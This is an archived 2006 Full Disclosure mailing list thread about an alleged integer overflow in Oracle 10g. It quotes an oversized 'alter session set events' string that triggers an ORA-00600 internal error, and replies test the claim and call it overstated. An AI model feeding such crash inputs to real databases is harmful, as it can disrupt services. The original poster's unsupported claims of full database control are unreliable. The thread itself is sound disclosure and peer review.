Full Disclosure mailing list archives
Re: Oracle 10g R2 and, probably, all previous versions
From: Russell Lowenthal <perpetualv () yahoo com>
Date: Fri, 28 Jul 2006 13:13:53 -0700 (PDT)
Doh! Busted right back! Now I get the same results (assuming I grant the user alter session of course - if the user doesn't have alter session I get the privilege error).

Thanks Raj!

--- rjamya <rjamya () gmail com> wrote:

Russell, you have a syntax error, you need a comma before LEVEL.

Raj

On 7/28/06, Russell Lowenthal <perpetualv () yahoo com> wrote:

Interesting comment. So if I understand what you are saying I should be able to create a user:

SQL> create user nottoosmart identified by d0ntkn0wmuch;
User created.
SQL> grant create session to nottoosmart;
Grant succeeded.
SQL> connect nottoosmart/d0ntkn0wmuch
Connected.
SQL> alter session set events '10046 trace name context forever level 16';
ERROR:
ORA-01031: insufficient privileges

Hmm - would you mind posting your EXACT test case? I ran this against a 9.2.0.7, 10.2.0.1 and 10.2.0.2 database and seem to get different results than you are seeing.

Just for the heck of it I went ahead and granted the user alter session privileges:

SQL> conn / as sysdba
Connected.
SQL> grant alter session to nottoosmart;
Grant succeeded.
SQL> connect nottoosmart/d0ntkn0wmuch
Connected.
SQL> alter session set events '10046 trace name context forever level 16';
ERROR:
ORA-02194: event specification syntax error 230 (minor error 215) near 'LEVEL'

so even a user that I've purposely given privileges to alter their own session doesn't seem to be able to do anything with this command.

So far I have to call this myth: Busted

---Original message----

I can't believe it. Oracle releases new patches and they have not solved one of the main problems: A user with only the SELECT privilege can do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!!

I'm not sure if it is time to full disclosure it but, anyway, I will "full disclosure" one innocent issue, an integer overflow:

Example:

--Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';
Session altered.
SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004
61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], []

It's not even a crash but (be sure) that there are other "combinations" that make it vulnerable to integer overflows allowing the execution of arbitrary code.

PD: Hello Mary Ann! Are you on holidays?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Oracle 10g R2 and, probably, all previous versions putosoft softputo (Jul 27)
- chaseonline security Geo. (Jul 28)
- <Possible follow-ups>
- Oracle 10g R2 and, probably, all previous versions Russell Lowenthal (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions rjamya (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions Russell Lowenthal (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions rjamya (Jul 28)